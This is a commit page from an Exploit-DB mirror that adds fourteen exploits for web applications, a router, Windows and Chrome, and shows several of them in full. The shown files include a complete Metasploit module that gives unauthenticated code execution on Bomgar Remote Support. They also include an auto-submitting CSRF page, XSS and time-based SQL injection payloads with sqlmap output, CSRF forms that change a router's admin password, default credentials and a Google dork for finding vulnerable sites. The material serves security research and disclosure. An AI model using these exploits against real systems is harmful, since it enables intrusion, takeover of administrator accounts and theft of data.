bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-06-16

Browse source 
14 new exploits

Ultrabenosaurus ChatBoard - Stored XSS
Ultrabenosaurus ChatBoard - CSRF (Send Message)
w2wiki - Multiple XSS Vulnerabilities
Hyperoptic (Tilgin) Router HG23xx - Multiple Vulnerabilities
Dokeos 2.2.1 - Blind SQL Injection
Joomla En Masse (com_enmasse) Component 5.1 - 6.4 - SQL Injection
AdobeUpdateService 3.6.0.248 - Unquoted Service Path Privilege Escalation
BookingWizz Booking System < 5.5 - Multiple Vulnerabilities
jbFileManager - Directory Traversal
PHPLive 4.4.8 - 4.5.4 - Password Recovery SQL Injection
Bomgar Remote Support Unauthenticated Code Execution (msf)
Windows 7 - win32k Bitmap Use-After-Free (MS16-062) (1)
Windows 7 - win32k Bitmap Use-After-Free (MS16-062) (2)
Google Chrome - GPU Process MailboxManagerImpl Double-Read
This commit is contained in:
Offensive Security 2016-06-16 05:02:53 +00:00
parent 6c005f3b2b
commit 33dd246d8a
15 changed files with 1213 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

14
files.csv
View file

@ -36125,3 +36125,17 @@ id,file,description,date,author,platform,type,port
39945,platforms/linux/remote/39945.rb,"Apache Continuum Arbitrary Command Execution",2016-06-14,metasploit,linux,remote,8080
39946,platforms/php/webapps/39946.php,"WordPress Social Stream Plugin 1.5.15 - wp_options Overwrite",2016-06-14,wp0Day.com,php,webapps,80
39947,platforms/windows/dos/39947.py,"Oracle Orakill.exe 11.2.0 - Buffer Overflow",2016-06-14,hyp3rlinx,windows,dos,0
39948,platforms/php/webapps/39948.txt,"Ultrabenosaurus ChatBoard - Stored XSS",2016-06-15,HaHwul,php,webapps,80
39949,platforms/php/webapps/39949.html,"Ultrabenosaurus ChatBoard - CSRF (Send Message)",2016-06-15,HaHwul,php,webapps,80
39950,platforms/php/webapps/39950.txt,"w2wiki - Multiple XSS Vulnerabilities",2016-06-15,HaHwul,php,webapps,80
39951,platforms/hardware/webapps/39951.txt,"Hyperoptic (Tilgin) Router HG23xx - Multiple Vulnerabilities",2016-06-15,LiquidWorm,hardware,webapps,80
39952,platforms/php/webapps/39952.txt,"Dokeos 2.2.1 - Blind SQL Injection",2016-06-15,Mormoroth,php,webapps,80
39953,platforms/php/webapps/39953.txt,"Joomla En Masse (com_enmasse) Component 5.1 - 6.4 - SQL Injection",2016-06-15,"Hamed Izadi",php,webapps,80
39954,platforms/windows/local/39954.txt,"AdobeUpdateService 3.6.0.248 - Unquoted Service Path Privilege Escalation",2016-06-15,"Cyril Vallicari",windows,local,0
39955,platforms/php/webapps/39955.txt,"BookingWizz Booking System < 5.5 - Multiple Vulnerabilities",2016-06-15,"Mehmet Ince",php,webapps,80
39956,platforms/php/webapps/39956.txt,"jbFileManager - Directory Traversal",2016-06-15,HaHwul,php,webapps,80
39957,platforms/php/webapps/39957.py,"PHPLive 4.4.8 - 4.5.4 - Password Recovery SQL Injection",2016-06-15,"Tiago Carvalho",php,webapps,80
39958,platforms/linux/remote/39958.rb,"Bomgar Remote Support Unauthenticated Code Execution (msf)",2016-06-15,"Markus Wulftange",linux,remote,443
39959,platforms/windows/dos/39959.txt,"Windows 7 - win32k Bitmap Use-After-Free (MS16-062) (1)",2016-06-15,"Nils Sommer",windows,dos,0
39960,platforms/windows/dos/39960.txt,"Windows 7 - win32k Bitmap Use-After-Free (MS16-062) (2)",2016-06-15,"Nils Sommer",windows,dos,0
39961,platforms/linux/dos/39961.txt,"Google Chrome - GPU Process MailboxManagerImpl Double-Read",2016-06-15,"Google Security Research",linux,dos,0

Can't render this file because it is too large.

100
platforms/hardware/webapps/39951.txt Executable file
View file

@ -0,0 +1,100 @@
Hyperoptic (Tilgin) Router HG23xx Multiple XSS And CSRF Vulnerabilities
Vendor: Hyperoptic Ltd. | Tilgin AB
Product web page: http://www.hyperoptic.com
http://www.tilgin.com
Affected version: HG2330, HG2302 and HG2301
Summary: Tilgin's HG23xx family of products offers a flexible and
high capacity product in a tiny form factor. When having the product
in your hands, do not get fooled by its mere size. The product offers
full gigabit routing and a state of the art superior WLAN solution.
It runs all services offered with Tilgin HGA and is prepared for all
foreseeable future services. The product is also offered in an entry
level version with fast Ethernet LAN ports, still with gigabit Ethernet
WAN. The routing capacity and excellent WLAN remains the same also on
this model, the only limit being the fast Ethernet LAN ports.
Desc: The application allows users to perform certain actions via HTTP
requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site. XSS issues
were also discovered. The issue is triggered when input passed via multiple
POST and GET parameters are not properly sanitized before being returned
to the user. This can be exploited to execute arbitrary HTML and script
code in a user's browser session in context of an affected site.
Tested on: lighttpd/1.4.26-devel-166445
lighttpd/1.4.26-devel-163573
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5329
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5329.php
11.05.2016
--
Default credentials:
--------------------
user/user
admin/admin
admin/abcd2301
XSS PoC:
--------
POST /advanced/firewall_templates/ HTTP/1.1
Host: 192.168.1.1
__form=new&name=test"><script>prompt(1)</script>
Response:
[..snip..]
<INPUT type="hidden" name="name" value="test"><script>prompt(1)</script>">
[..snip..]
CSRF Add Storage (HTTP/SMB) User:
---------------------------------
<html>
<body>
<form action="http://192.168.1.1/storage/users/" method="POST">
<input type="hidden" name="&#95;&#95;form" value="new" />
<input type="hidden" name="name" value="testuser" />
<input type="hidden" name="password" value="testpass" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
CSRF Change Admin Password:
---------------------------
<html>
<body>
<form action="http://192.168.1.1/tools/admin_account/" method="POST">
<input type="hidden" name="&#95;&#95;form" value="user" />
<input type="hidden" name="name" value="admin" />
<input type="hidden" name="password" value="NEWPASS" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

165
platforms/linux/dos/39961.txt Executable file
View file

@ -0,0 +1,165 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=780
Several functions in the GPU command buffer service interact with the GPU
mailbox manager (gpu/command_buffer/service/mailbox_manager_impl.cc), passing a reference to shared memory as the mailbox argument.
MailboxManagerImpl does not expect this mailbox argument to be malleable in this way, and it is in several places copied and passed to various stl functions, resulting in unexpected behaviour from double-reads when an attacker modifies the mailbox name mid function.
The attached POC uses the GPU command 'ProduceTextureDirectCHROMIUMImmediate' to trigger a use-after-free but other commands that interact with the mailbox manager should also be vulnerable in a similar way.
error::Error GLES2DecoderImpl::HandleProduceTextureDirectCHROMIUMImmediate(
uint32_t immediate_data_size,
const void* cmd_data) {
const gles2::cmds::ProduceTextureDirectCHROMIUMImmediate& c =
*static_cast<const gles2::cmds::ProduceTextureDirectCHROMIUMImmediate*>(
cmd_data);
(void)c;
GLuint texture = c.texture;
GLenum target = static_cast<GLenum>(c.target);
uint32_t data_size;
if (!ComputeDataSize(1, sizeof(GLbyte), 64, &data_size)) {
return error::kOutOfBounds;
}
if (data_size > immediate_data_size) {
return error::kOutOfBounds;
}
// ** mailbox is a pointer into our shared memory buffer **
const GLbyte* mailbox =
GetImmediateDataAs<const GLbyte*>(c, data_size, immediate_data_size);
if (!validators_->texture_bind_target.IsValid(target)) {
LOCAL_SET_GL_ERROR_INVALID_ENUM("glProduceTextureDirectCHROMIUM", target,
"target");
return error::kNoError;
}
if (mailbox == NULL) {
return error::kOutOfBounds;
}
DoProduceTextureDirectCHROMIUM(texture, target, mailbox);
return error::kNoError;
}
void GLES2DecoderImpl::DoProduceTextureDirectCHROMIUM(GLuint client_id,
GLenum target, const GLbyte* data) {
TRACE_EVENT2("gpu", "GLES2DecoderImpl::DoProduceTextureDirectCHROMIUM",
"context", logger_.GetLogPrefix(),
"mailbox[0]", static_cast<unsigned char>(data[0]));
ProduceTextureRef("glProduceTextureDirectCHROMIUM", GetTexture(client_id),
target, data);
}
void GLES2DecoderImpl::ProduceTextureRef(const char* func_name,
TextureRef* texture_ref,
GLenum target,
const GLbyte* data) {
// ** mailbox is still a pointer to shared memory **
const Mailbox& mailbox = *reinterpret_cast<const Mailbox*>(data);
DLOG_IF(ERROR, !mailbox.Verify()) << func_name << " was passed a "
"mailbox that was not generated by "
"GenMailboxCHROMIUM.";
if (!texture_ref) {
LOCAL_SET_GL_ERROR(
GL_INVALID_OPERATION, func_name, "unknown texture for target");
return;
}
Texture* produced = texture_manager()->Produce(texture_ref);
if (!produced) {
LOCAL_SET_GL_ERROR(
GL_INVALID_OPERATION, func_name, "invalid texture");
return;
}
if (produced->target() != target) {
LOCAL_SET_GL_ERROR(
GL_INVALID_OPERATION, func_name, "invalid target");
return;
}
group_->mailbox_manager()->ProduceTexture(mailbox, produced);
}
void MailboxManagerImpl::ProduceTexture(const Mailbox& mailbox,
Texture* texture) {
MailboxToTextureMap::iterator it = mailbox_to_textures_.find(mailbox);
if (it != mailbox_to_textures_.end()) {
if (it->second->first == texture)
return;
TextureToMailboxMap::iterator texture_it = it->second;
mailbox_to_textures_.erase(it);
textures_to_mailboxes_.erase(texture_it);
}
InsertTexture(mailbox, texture);
}
void MailboxManagerImpl::InsertTexture(const Mailbox& mailbox,
Texture* texture) {
texture->SetMailboxManager(this);
TextureToMailboxMap::iterator texture_it =
textures_to_mailboxes_.insert(std::make_pair(texture, mailbox));
// ** modify mailbox at this point **
mailbox_to_textures_.insert(std::make_pair(mailbox, texture_it));
DCHECK_EQ(mailbox_to_textures_.size(), textures_to_mailboxes_.size());
}
We can leverage this for memory corruption in the GPU process by a slightly roundabout route; since each entry in the mailbox_to_textures_ has an iterator to an entry in textures_to_mailboxes_, and it is an expected invariant that both of these entries have the same mailbox name. By starting to create a mailbox named aaaa...aaaa and waiting until the first insert is complete before changing the mailbox name to AAAA...aaaa, then adding a second entry with the same texture reference but with the actual name aaaa...aaaa we get the following situation (example trace through the code from ProduceTexture with InsertTexture call inlined):
// first entry - mailbox.name = 'aaaa...aaaa', texture = t1
MailboxToTextureMap::iterator it = mailbox_to_textures_.find(mailbox);
// if body not executed
if (it != mailbox_to_textures_.end()) {}
texture->SetMailboxManager(this);
TextureToMailboxMap::iterator texture_it =
textures_to_mailboxes_.insert(std::make_pair(texture, mailbox));
// modify - mailbox.name = 'AAAA...aaaa'
mailbox_to_textures_.insert(std::make_pair(mailbox, texture_it));
DCHECK_EQ(mailbox_to_textures_.size(), textures_to_mailboxes_.size());
// mailbox_to_textures_ textures_to_mailboxes_
// AAAA...aaaa, it ------------------------------> aaaa...aaaa, t1
// second entry - mailbox.name = 'aaaa...aaaa', texture = t1
MailboxToTextureMap::iterator it = mailbox_to_textures_.find(mailbox);
// if body not executed (since 'AAAA...aaaa' != 'aaaa...aaaa')
if (it != mailbox_to_textures_.end()) {}
texture->SetMailboxManager(this);
TextureToMailboxMap::iterator texture_it =
textures_to_mailboxes_.insert(std::make_pair(texture, mailbox));
// texture_it is the same as before; since there already exists the pair
// 'aaaa...aaaa', t1* in textures_to_mailboxes, the insert returns an
// iterator to the existing element.
mailbox_to_textures_.insert(std::make_pair(mailbox, texture_it));
DCHECK_EQ(mailbox_to_textures_.size(), textures_to_mailboxes_.size());
// mailbox_to_textures_ textures_to_mailboxes_
// AAAA...aaaa, it ------------------------------> aaaa...aaaa, t1
// aaaa...aaaa, it -----------/
// so both entries in mailbox_to_textures_ have the same iterator.
// third entry - mailbox.name = 'aaaa...aaaa', texture = t2
MailboxToTextureMap::iterator it = mailbox_to_textures_.find(mailbox);
// this time we find an entry
if (it != mailbox_to_textures_.end()) {
// t1 != t2
if (it->second->first == texture)
return;
// so we remove the previous entry for aaaa...aaaa
TextureToMailboxMap::iterator texture_it = it->second;
mailbox_to_textures_.erase(it);
textures_to_mailboxes_.erase(texture_it);
}
// mailbox_to_textures_ textures_to_mailboxes_
// AAAA...aaaa, it ------------------------------> ??
// aaaa...aaaa, it ------------------------------> aaaa...aaaa, t2
Leaving mailbox AAAA...aaaa with a dangling reference to a no-longer valid iterator into textures_to_mailboxes_; (std::map and std::multimap iterators are invalidated by a call to erase() the element that they reference). The attached poc then calls some further methods on the mailbox to trigger a use of the dangling iterator that is detectable by ASAN.
Updated POC to work on the latest asan linux build, command buffer ids were out of date.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39961.zip

253
platforms/linux/remote/39958.rb Executable file
View file

@ -0,0 +1,253 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize
super(
'Name' => 'Bomgar Remote Support Unauthenticated Code Execution',
'Description' => %q{
This module exploits a vulnerability in the Bomgar Remote Support, which
deserializes user provided data using PHP's `unserialize` method.
By providing an specially crafted PHP serialized object, it is possible
to write arbitrary data to arbitrary files. This effectively allows the
execution of arbitrary PHP code in the context of the Bomgar Remote Support
system user.
To exploit the vulnerability, a valid Logging Session ID (LSID) is required.
It consists of four key-value pairs (i. e., 'h=[...];l=[...];m=[...];t=[...]')
and can be retrieved by an unauthenticated user at the end of the process
of submitting a new issue via the 'Issue Submission' form.
Versions before 15.1.1 are reported to be vulnerable.
},
'Author' =>
[
'Markus Wulftange',
],
'License' => MSF_LICENSE,
'DisclosureDate' => 'May 5 2015',
'References' =>
[
['CWE', '94'],
['CWE', '502'],
['CVE', '2015-0935'],
['US-CERT-VU', '978652'],
['URL', 'http://codewhitesec.blogspot.com/2015/05/cve-2015-0935-bomgar-remote-support-portal.html'],
],
'Privileged' => false,
'Targets' =>
[
[ 'Linux x86',
{
'Platform' => 'linux',
'Arch' => ARCH_X86,
'CmdStagerFlavor' => [ :echo, :printf ]
}
],
[ 'Linux x86_64',
{
'Platform' => 'linux',
'Arch' => ARCH_X86_64,
'CmdStagerFlavor' => [ :echo, :printf ]
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' =>
{
'RPORT' => 443,
'SSL' => true,
'TARGETURI' => '/session_complete',
},
)
register_options(
[
OptString.new('LSID', [true, 'Logging Session ID']),
], self.class
)
end
def check
version = detect_version
if version
print_status("Version #{version} detected")
if version < '15.1.1'
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Safe
end
end
print_status("Version could not be detected")
return Exploit::CheckCode::Unknown
end
def exploit
execute_cmdstager
handler
end
def execute_command(cmd, opts)
tmpfile = "/tmp/#{rand_text_alphanumeric(10)}.php"
vprint_status("Uploading payload to #{tmpfile} ...")
upload_php_file(tmpfile, generate_stager_php(cmd))
vprint_status("Triggering payload in #{tmpfile} ...")
execute_php_file(tmpfile)
end
def detect_version
res = send_request_raw(
'uri' => '/'
)
if res and res.code == 200 and res.body.to_s =~ /<!--Product Version: (\d+\.\d+\.\d+)-->/
return $1
end
end
def upload_php_file(filepath, data)
send_pso(generate_upload_file_pso(filepath, data))
end
def execute_php_file(filepath)
send_pso(generate_autoload_pso(filepath))
end
def send_pso(pso)
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'vars_post' => {
'lsid' => datastore['LSID'],
'survey' => pso,
}
)
if res
if res.code != 200
fail_with(Failure::UnexpectedReply, "Unexpected response from server: status code #{res.code}")
end
if res.body.to_s =~ />ERROR: ([^<>]+)</
fail_with(Failure::Unknown, "Error occured: #{$1}")
end
else
fail_with(Failure::Unreachable, "Error connecting to the remote server") unless successful
end
res
end
def generate_stager_php(cmd)
"<?php unlink(__FILE__); passthru('#{cmd.gsub(/[\\']/, '\\\\\&')}');"
end
def generate_upload_file_pso(filepath, data)
log_file = PHPObject.new(
"Log_file",
{
"_filename" => filepath,
"_lineFormat" => "",
"_eol" => data,
"_append" => false,
}
)
logger = PHPObject.new(
"Logger",
{
"\0Logger\0_logs" => [ log_file ]
}
)
tracer = PHPObject.new(
"Tracer",
{
"\0Tracer\0_log" => logger
}
)
serialize(tracer)
end
def generate_autoload_pso(filepath)
object = PHPObject.new(
filepath.chomp('.php').gsub('/', '_'),
{}
)
serialize(object)
end
class PHPObject
attr_reader :name, :members
def initialize(name, members)
@name = name
@members = members
end
end
def serialize(value)
case value.class.name.split('::').last
when 'Array' then serialize_array_numeric(value)
when 'Fixnum' then serialize_integer(value)
when 'Float' then serialize_double(value)
when 'Hash' then serialize_array_assoc(value)
when 'Nil' then serialize_nil
when 'PHPObject' then serialize_object(value)
when 'String' then serialize_string(value)
when 'TrueClass', 'FalseClass' then serialize_boolean(value)
else raise "Value of #{value.class} cannot be serialized"
end
end
def serialize_array_numeric(a)
"a:#{a.size}:{" + a.each_with_index.map { |v, i|
serialize_integer(i) + serialize(v)
}.join + "}"
end
def serialize_array_assoc(h)
"a:#{h.size}:{" + h.each_pair.map { |k, v|
serialize_string(k) + serialize(v)
}.join + "}"
end
def serialize_boolean(b)
"b:#{b ? '1' : '0'};"
end
def serialize_double(f)
"d:#{f};"
end
def serialize_integer(i)
"i:#{i};"
end
def serialize_null
"N;"
end
def serialize_object(o)
"O:#{serialize_string(o.name)[2..-2]}:#{serialize_array_assoc(o.members)[2..-1]}"
end
def serialize_string(s)
"s:#{s.size}:\"#{s}\";"
end
end

28
platforms/php/webapps/39948.txt Executable file
View file

@ -0,0 +1,28 @@
# Exploit Title: Ultrabenosaurus ChatBoard - Stored XSS
# Date: 2016-06-14
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: http://ultrabenosaurus.ninja/
# Software Link: https://github.com/Ultrabenosaurus/ChatBoard/archive/master.zip
# Tested on: Debian [wheezy]
### Vulnerability Point
chat.php is not filtering special character
-> file: ./chat.php
-> param: msg
### Vulnerability Code
POST /vul_test/ChatBoard/__original/chat.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1/vul_test/ChatBoard/__original/?chat
Content-Length: 10
Cookie: PHPSESSID=3oecem8o5c8975dcufbb0moqn5
Connection: keep-alive
msg=654<img src="z" onerror=zz>asd

50
platforms/php/webapps/39949.html Executable file
View file

@ -0,0 +1,50 @@
<!--
# Exploit Title: Ultrabenosaurus ChatBoard - CSRF(Send Message)
# Date: 2016-06-14
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: http://ultrabenosaurus.ninja/
# Software Link: https://github.com/Ultrabenosaurus/ChatBoard/archive/master.zip
# Tested on: Debian [wheezy]
### Vulnerability Code
-----------------------------------------------------------------------------------------
POST /vul_test/ChatBoard/__original/chat.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://CSRF_NO_REFERE_CHECK
Content-Length: 8
Cookie: PHPSESSID=3oecem8o5c8975dcufbb0moqn5
Connection: keep-alive
msg=CSRF
### Response
-----------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Tue, 14 Jun 2016 01:52:02 GMT
Server: Apache/2.4.10 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 7
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
written
-----------------------------------------------------------------------------------------
### Vulnerability Code
-->
<form name="csrf_poc" action="http://127.0.0.1/vul_test/ChatBoard/__original/chat.php" method="POST">
<input type="hidden" name="msg" value="CSRF">
<input type="submit" value="CSRF Attack">
</form>
<script type="text/javascript">document.forms.csrf_poc.submit();</script>

32
platforms/php/webapps/39950.txt Executable file
View file

@ -0,0 +1,32 @@
# Exploit Title: w2wiki - Multiple XSS(Stored/Reflected)
# Date: 2016-06-14
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: https://github.com/panicsteve/w2wiki , http://groups.google.com/group/w2wiki
# Software Link: https://github.com/panicsteve/w2wiki/archive/master.zip
# Tested on: Debian [wheezy]
### Vulnerability 1 : Stored XSS
POST /vul_test/w2wiki/index.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/vul_test/w2wiki/index.php?action=new
Cookie: PHPSESSID=3oecem8o5c8975dcufbb0moqn5; W2=dgf6v5tn2ea8uitvk98m2tfjl7
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 82
page=xss&newText=afsd%3Cimg+src%3D%22h%22+onerror%3Dalert%2845%29%3Eaa&action=save
# Vulnerability influence can be found in the wiki. -> script in created page
================================================================================================
### Vulnerability 2 : Reflected XSS
edit page
http://127.0.0.1/vul_test/w2wiki/index.php?action=edit&page="><img src="z" onerror=alert(45)>
search page
http://127.0.0.1/vul_test/w2wiki/index.php?action=search&q="><img src="z" onerror=alert(45)>

38
platforms/php/webapps/39952.txt Executable file
View file

@ -0,0 +1,38 @@
# Exploit Title: Dokeos Blind SQL Injection
# Date: 2016-06-14
# Exploit Author: Mormoroth
# Exploit Author Blog: http://ha.cker.ir
# Vendor Homepage: http://www.dokeos.com/
# Software Link: http://jaist.dl.sourceforge.net/project/dokeos/dokeos-2.1.1.zip
# Version: 2.2.1
# Tested on: Ubuntu
# Twitter : https://twitter.com/Mormoroth
------
Note : hackme.com is localdomain on lab , not a live website
------
VULNERABILITY
curdirpath in slidshow.php is vulnerable to time-based blind sqlinjection
------
POC :
Payload: http://hackme.com:80/dokeos-2.1.1/main/document/slideshow.php?cidReq=123&curdirpath=' AND (SELECT * FROM (SELECT(SLEEP(5)))Pfag) AND 'NFwV'='NFwV&slide_id=all
------
Exploiting vulnerability with Sqlmap
Note : to exploit with sqlmap you should use --tamper=between option to retrieve data
------
Parameter: #1* (URI)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: http://hackme.com:80/dokeos-2.1.1/main/document/slideshow.php?cidReq=123&curdirpath=' AND (SELECT * FROM (SELECT(SLEEP(5)))Pfag) AND 'NFwV'='NFwV&slide_id=all
------
[22:25:09] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7
back-end DBMS: MySQL 5.0.12
[22:25:09] [INFO] fetching current database
[22:25:09] [INFO] resumed: dokeos_main
current database: 'dokeos_main'
[22:25:09] [INFO] fetched data logged to text files under 'C:\Users\Mort\.sqlmap\output\hackme.com'
C:\Users\Mort\Desktop\Apps\sqlmap>
------

24
platforms/php/webapps/39953.txt Executable file
View file

@ -0,0 +1,24 @@
# Exploit Title: Joomla com_enmasse - SQL Injection
# Author: [ Hamed Izadi ]
#IRAN
# Vendor Homepage : http://extensions.joomla.org/extensions/extension/social-web/social-buy/en-masse
# Category: [ Webapps ]
# Tested on: [ Win ]
# Versions: 5.1-6.4
# Date: 2016/06/15
# Google Dork: inurl:component/enmasse/
# PoC:
# id Parameter Vulnerable To SQL
# Demo:
# http://server/component/enmasse/term?tmpl=component&id=2%27
# Youtube: https://youtu.be/LB5qVnXhzXE
# L u Arg

276
platforms/php/webapps/39955.txt Executable file
View file

@ -0,0 +1,276 @@
1. ADVISORY INFORMATION
========================================
Title: BookingWizz < 5.5 Multiple Vulnerability
Application: BookingWizz
Class: Sensitive Information disclosure
Remotely Exploitable: Yes
Versions Affected: < 5.5
Vendor URL: http://codecanyon.net/item/booking-system/87919
Bugs: Default credentials, CSRF, XXS, SQLi Injection, LFI
Date of Public Advisory: 15 Jun 2016
Author: Mehmet Ince
2. CREDIT
========================================
Those vulnerabilities was identified during external penetration test
by Mehmet INCE from PRODAFT / INVICTUS
Original Advisory:
https://www.mehmetince.net/exploit/bookingwizz-55-multiple-vulnerability
PR1 - Default Administrator Credentials
========================================
File: install.php
People are to lazy to change default credential unless application force
them to do that.
Line 128: <br />Default username/password: <b>admin/pass</b></div>";
PR2 - Cross Site Scripting
========================================
File : eventList.php
// Improper user input validation on
Line 24: $serviceID =
(!empty($_REQUEST["serviceID"]))?strip_tags(str_replace("'","`",$_REQUEST["serviceID"])):getDefaultService();
Line 60: <?php echo SAMPLE_TEXT?> <strong><?php echo VIEW?> <a
href="index.php?serviceID=<?php echo $serviceID?>"><?php echo
CALENDAR?></a></strong>
Payload = 1337" onmouseover="alert(1)
PoC =
http://www.convergine.com/scripts/booking/eventList.php?serviceID=1337%22%20onmouseover=%22alert(1)
PR3 - Local File Inclusion
========================================
File:config.php
Lang variable is under the user control.
Line 31: $lang = (!empty($_REQUEST["lang"])) ? strip_tags(str_replace("'",
"`", $_REQUEST["lang"])) : 'english';
Storing user controlled variable within session variable.
Line 36 - 38 :
if (!empty($_REQUEST["action"]) && $_REQUEST["action"] == "changelang") {
$_SESSION['curr_lang'] = $lang;
}
And using it with include function which cause straightforward file
inclusion.
Line 60 - 68:
$languagePath = MAIN_PATH."/languages/".$_SESSION['curr_lang'].".lang.php";
if(is_file($languagePath)) {
include MAIN_PATH."/languages/".$_SESSION['curr_lang'].".lang.php";
}else{
print "ERROR !!! Language file ".$_SESSION['curr_lang'].".lang.php not
found";
exit();
}
PR4 - SQL Injection
========================================
We've seen a lot of potentially SQL Injection vulnerability during code
review.
2 example can be given for this potential points.
File : ajax/checkDeletedServices.php
line 19 - 20:
$bsid = (!empty($_REQUEST["bsid"])) ? $_REQUEST["bsid"] : array();
$type = (!empty($_REQUEST["type"])) ? $_REQUEST["type"] : 'service';
Line 26:
if($type=='service'){
$service = getService($id);
$name = $service['name'];
}
This function executes query with $id parameter which is user input through
checkDeletedServices.php file.
function getService($id, $field=null) {
$sql = "SELECT * FROM bs_services WHERE id='{$id}'";
$res = mysql_query($sql);
if ($field == null) {
return mysql_fetch_assoc($res);
} else {
$row = mysql_fetch_assoc($res);
return $row[$field];
}
}
File : ajax/checkChangeAvailability.php
Line 19 -21
$id = (!empty($_REQUEST["id"])) ? $_REQUEST["id"] : '';
$interval = getServiceSettings($id,'interval');
getServiceSettings function calls another function named as getService
which is also vulnerable against SQL Injection.
function getServiceSettings($id, $field=null) {
$serviceType = getService($id,'type');
if($serviceType=='t'){
$sql = "SELECT * FROM bs_service_settings bss
INNER JOIN bs_services bs ON bss.serviceId = bs.id
WHERE bss.serviceID='{$id}'";
}else{
$sql = "SELECT * FROM bs_service_days_settings bsds
INNER JOIN bs_services bs ON bsds.idService = bs.id
WHERE bsds.idService='{$id}'";
}
$res = mysql_query($sql);
$row = mysql_fetch_assoc($res);
$row['type'] = $serviceType;
if ($field == null) {
return $row;
} else {
return $row[$field];
}
}
In order to exploit this flaws, Time Based SQLi techniques was used.
Payload: id=1' AND SLEEP(5) AND 'WAlE'='WAlE
PR5 - CSRF
========================================
File: bs-settings.php
This file is reponsible for administrator account settings. Here is the
HTTP POST request.
POST /booking/bs-settings.php HTTP/1.1
Host: www.test.dev
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101
Firefox/36.04
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.test.dev/scripts/booking/bs-settings.php
Cookie: PHPSESSID=1511036c75229f53ae475a0615661394;
__utma=256227097.1395600583.1465982938.1465982938.1465982938.1;
__utmc=256227097;
__utmz=256227097.1465982938.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
wordfence_verifiedHuman=498f28acf0e6151e19053a23c0fbc76b
Connection: close
Content-Type: multipart/form-data;
boundary=---------------------------305761854111129072091034307
Content-Length: 2678
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="new_pass"
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="new_pass2"
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="email"
test@yopmail.com
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="pemail"
test@yopmail.com
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="pcurrency"
CAD
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="tax"
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="time_mode"
0
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="date_mode"
Y-m-d
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="use_popup"
1
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="currency"
$
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="currencyPos"
b
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="lang"
english
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="language_switch"
1
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="timezone"
America/Toronto
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="multi_day_notification"
0
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="multi_day_notification_on"
n
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="single_day_notification"
0
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="single_day_notification_on"
n
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="event_notification"
0
